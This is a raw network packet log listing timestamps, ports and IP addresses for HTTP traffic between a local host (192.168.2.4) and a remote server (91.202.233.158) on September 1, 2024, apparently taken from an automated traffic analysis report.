Sep 1, 2024 18:28:14.519808054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519819975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519846916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.519916058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519927025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.519964933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520066023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520076036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520112991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520140886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520152092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520160913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520174026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520179987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520184040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520196915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520210981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520242929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520401001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520411968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520421982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520435095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520443916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520446062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520462036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520462036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520495892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520514965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520530939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520569086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520644903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520656109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520665884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520677090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520687103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520688057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520699024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520704985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520710945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.520730019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520746946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.520991087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521002054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521012068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521023035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521029949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.521033049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521044970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.521048069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.521075964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.521085024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.566792965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566804886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566814899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566865921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.566963911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566975117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566983938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.566994905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567008018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567051888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567051888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567051888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567090034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567101002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567111969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567120075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567122936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567132950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567135096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567146063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567153931 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567186117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567241907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567281961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567285061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567292929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567318916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567325115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567356110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567374945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567418098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567486048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567497015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567506075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567527056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567539930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567759037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567795038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567802906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567806005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567833900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567846060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567919016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567929983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567940950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567951918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567956924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.567962885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.567979097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.568007946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.568149090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568161011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568171024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568190098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.568195105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568205118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568216085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568217993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.568226099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.568243980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.568264008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604727983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604738951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604748964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604878902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604890108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604896069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604897022 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604926109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604926109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604935884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604937077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604948044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.604962111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604973078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.604989052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605061054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605072021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605082035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605097055 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605103970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605110884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605120897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605130911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605148077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605170965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605180025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605216026 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605246067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605257034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605290890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605447054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605458021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605468035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605479956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605489016 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605518103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605624914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605635881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605650902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605659962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605667114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605695963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605696917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605706930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605732918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605739117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605747938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605756044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605758905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605773926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605784893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605808020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605917931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605927944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605937004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.605961084 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.605986118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606045961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606055975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606074095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606090069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606091022 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606100082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606110096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606112957 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606121063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606132984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606138945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606164932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606179953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606452942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606463909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606498003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606556892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606566906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606576920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606587887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606599092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606600046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606616974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606642008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606723070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606734037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606744051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606755972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606760979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606774092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606786966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606791973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606802940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606812954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606815100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606823921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606826067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606853008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606874943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.606971979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606981993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.606992006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607002020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607014894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607017994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607028961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607028961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607039928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607044935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607052088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607060909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607067108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607070923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607084036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607095003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607108116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607136011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607283115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607292891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607304096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607326031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607351065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607425928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607436895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607446909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607458115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607469082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607475042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607479095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607496977 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607515097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.607606888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607618093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.607660055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653419971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653430939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653440952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653484106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653523922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653561115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653584003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653594017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653600931 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653604984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653614044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653616905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653628111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653637886 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653639078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653649092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653656006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653687000 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653693914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653734922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653831959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653841019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653851032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.653878927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.653908968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654046059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654087067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654174089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654184103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654194117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654205084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654217005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654218912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654227972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654237986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654246092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654264927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654273987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654426098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654469967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654481888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654493093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654520035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654532909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654562950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654573917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654611111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654910088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654956102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.654963970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654973984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.654999971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.655021906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.655040979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655050993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655061007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655072927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655078888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.655107021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.655107975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655118942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.655144930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.655167103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691375971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691387892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691397905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691417933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691433907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691551924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691561937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691576004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691590071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691610098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691620111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691622019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691632032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691643953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691646099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691653967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691668987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691668987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691696882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691705942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691807985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691818953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691845894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691848993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691859007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.691889048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.691911936 CEST	56177	80	192.168.2.4	91.202.233.158
